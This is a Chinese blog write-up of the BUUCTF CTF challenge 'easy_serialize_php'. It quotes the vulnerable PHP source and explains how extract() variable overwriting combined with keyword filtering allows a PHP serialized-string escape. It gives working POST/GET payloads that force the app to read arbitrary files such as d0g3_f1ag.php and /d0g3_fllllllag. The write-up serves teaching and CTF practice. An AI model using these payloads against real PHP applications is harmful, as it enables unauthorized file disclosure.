buuctf web easy_serialize_php1

最新推荐文章于 2023-03-30 10:44:51 发布
最新推荐文章于 2023-03-30 10:44:51 发布
阅读量515 收藏
点赞数
分类专栏: BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121817336
版权

web安全

审计源码

 <?php

$function = @$_GET['f'];
//正则匹配
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
//提取POST参数
extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
//img_path参数
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

关键的有两句,具体怎么用后面再说:

extract($_POST);
$serialize_info = filter(serialize($_SESSION));

然后可以观察到的是除了源码还提供了两个功能:phpinfo,show_image,phpinfo回显phpinfo()没啥好说的
show_image读取文件内容,这就是我们的注入点,那么flag在哪呢,phpinfo当然不会白给
注意到里面有一个d0g3_f1ag.php,这应该就是第一个提示,没啥好说的,img要被赋成这个值
由于sha1不可逆,所以不指望用原来的img能被赋成这个值了
好在还存在一个序列化操作,于是想到了对象逃逸,之前也遇到过,
就是你自定义了一个同名属性,然后把原来应有的属性给覆盖了,一般来说这跟后端的过滤机制有关
这里正则匹配就发生了作用,我们可以在传参时故意加一些flag之类的参数,然后序列化后字符串长度不变
所以会造成字符串逃逸
借用一下大佬的例子,来讲一下

#通过序列化和反序列以及序列化字符串被替换产生的漏洞,通过$str[a]更改$str[a123]后面的所有值
<?php
//error_reporting(0);
$str["a123"]="flagflagflagflag";
$str["a"]="\";s:1:\"c\";s:2:\"12\";s:1:\"t\";s:3:\"125\";}as";
$str["b"]="456";
$s=serialize($str);
print($s); //a:3:{s:4:"a123";s:16:"flagflagflagflag";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}
echo "\n";
$s1=preg_replace("/flag/","",$s); //a:3:{s:4:"a123";s:16:"";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}
print($s1);
$s2=unserialize($s1);
var_dump($s2);
?>

运行结果:

a:3:{s:4:"a123";s:16:"flagflagflagflag";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}
a:3:{s:4:"a123";s:16:"";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}array(3) {
  ["a123"]=>
  string(16) "";s:1:"a";s:40:""
  ["c"]=>
  string(2) "12"
  ["t"]=>
  string(3) "125"
}

运行之后可以明显发现由于flag被过滤了,所以造成原先的a属性被吞掉了,而带入了我们自定义的c和t
那么就是这么个原理,上payload:

_SESSION['flagflag']=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}//d0g3_f1ag.php的base64编码

第一步extract的时候读出来的是

$_SESSION['flagflag']=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

序列化session后:

a:2:{s:8:"flagflag";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

过filter:

a:2:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

反序列化后由于我们没给img_path,所以读的是我们给的img属性,就是d0g3_f1ag.php
反序列化的结果

,Array
(
    [";s:51:"] => aaa
    [img] => ZDBnM19mMWFnLnBocA==
)

很明显,读取的image文件是由我们定的,回显$flag = ‘flag in /d0g3_fllllllag’;
然后就是同样的操作,读取/d0g3_fllllllag,base64编码后是L2QwZzNfZmxsbGxsbGFn
于是得到payload:

_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

如果有wamp本地环境,把index.php小改可能会有助理解

<?php

$function = @$_GET['f'];
//正则匹配
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
//提取get参数
extract($_GET);

if(!$function){
    echo '<a href="test.php?f=highlight_file">source_code</a>';
}
//img_path参数
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));
print_r($_SESSION);
echo "\n";
echo serialize($_SESSION);
echo "\n";
echo $serialize_info;
echo "\n";
if($function == 'highlight_file'){
    highlight_file('test.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    print_r($userinfo);
   // echo file_get_contents(base64_decode($userinfo['img']));
}
?>

payload为:127.0.0.1/test.php?f=show_image&_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
参考视频链接:https://www.bilibili.com/video/BV1sZ4y1971T/

显哥无敌
关注
专栏目录
buuctf easy_serialize_php
qq_52671379的博客
03-30 1922
buuctf easy_serialize_php
easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF]
qwsn
11-24 1764
0x01、Web 1.easy_serialize_php-[安洵杯 2019]-[反序列化字符逃逸]-[关键词变少]-[传送门->BUUCTF] 第一步:打开题目环境,进入题目链接,代码审计 <?php $function = @$_GET['f']; //GET传参:f function filter($img){ //函数:filter(),使用$img传参 $filter_arr = array('php','flag','php5','ph
BUUCTF - Web - easy_serialize_php
1tachi的博客
12-07 452
文章目录源码分析知识点payload其他解法 源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
BUUCTF Web [安洵杯 2019]easy_serialize_php1
网安小趴菜
10-12 510
BUUCTF Web [安洵杯 2019]easy_serialize_php1
BUUCTF:[安洵杯 2019]easy_serialize_php
qq_46230755的博客
12-30 876
看题目,应该是和反序列化有关。 先查看一下源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
BUUCTF-WEB
ccfly1012的博客
11-02 3909
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF web(二)
m0_46616663的博客
10-21 1425
[极客大挑战 2019]Upload upload想到了文件上传漏洞,先传个一句话木马试试,php和图片马都不行 试一下phtml,phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 也不行,抓包改一下Content-Type 不让用<?,那就换一种 。。。。 再加个文件头 GIF89a OK了,猜测路径应该在/upload里面 蚁剑连上找到根目录下的flag [RoarCTF 2019]Easy Calc 源码发现 <?php error_reportin
BUUCTF Web1
ookami6497的博客
12-11 924
BUUCTF-[羊城杯]Easyser
m0_52358157的博客
06-11 1059
BUU:[羊城杯 2020]EasySer –菜鸟的第一篇ctf题解 一开始拿到题目一面懵,于是常规的查看robots.txt,很幸运提示要你去访问/star1.php 进入到这个界面接着遇事不决f12得到提示使用一个不安全协议获取ser.php 然后开始了漫长的各种尝试:各种php伪协议,各种百度去搜寻不安全的协议,并没有什么结果。后来想到有一位师傅讲过http相对比于https是不安全的,因为它无状态,无连接,具有简单快速、灵活的特性,通信时候使用明文,也不会对通信方进行确认(重点在这!) 所以可以利
[CTF][安洵杯 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸
Gh0st_1n_The_Shell的博客
08-28 1416
[安洵杯 2019]easy_serialize_php 1 首先打开靶机,只有一个链接没有其他东西 目录爆破没有爆破出来东西,打开链接,发现给出了网站源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; retu
buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解)
小宇的web博客
02-24 1969
buuctf-[安洵杯 2019]easy_serialize_php (小宇特详解) 1.先看题目,出现了一段代码,进行代码审计 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla
buuctf[安洵杯 2019]easy_serialize_php
最新发布
2202_75317918的博客
03-30 490
buuctf[安洵杯 2019]easy_serialize_php
[ctf web][安洵杯 2019]easy_serialize_php writeup
ShenZ的博客
09-02 360
[安洵杯 2019]easy_serialize_php 知识点: extract()变量覆盖 字符串覆盖逃逸—构造 源码: <?php $function = @$_GET['f']; //get f为function function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; r
【学习笔记 45】 buu [安洵杯 2019]easy_serialize_php
weixin_43553654的博客
08-03 539
0x00 知识点 php反序列化逃逸 代码审计 0x01 知识点详解 什么是php反序列化逃逸? 答: <?php $_SESSION["user"]='flagflagflagflagflagflag'; $_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}'; $_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn'; echo serialize($_SE
[安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。
cainiao17441898的博客
06-06 357
解题: 打开源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESS
BUUCTF刷题记录(4)
bmth666的博客
04-12 1494
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
[安洵杯 2019]easy_serialize_php
Yb_140的博客
10-16 514
变量覆盖+反序列化字符串逃逸
[安洵杯 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3133
[安洵杯 2019]easy_serialize_php 反序列化
easy_serialize_php
beihai2013
01-19 485
easy_serialize_php 考察:php代码审计,php序列化 打开页面,打开view-source,可以看到源代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值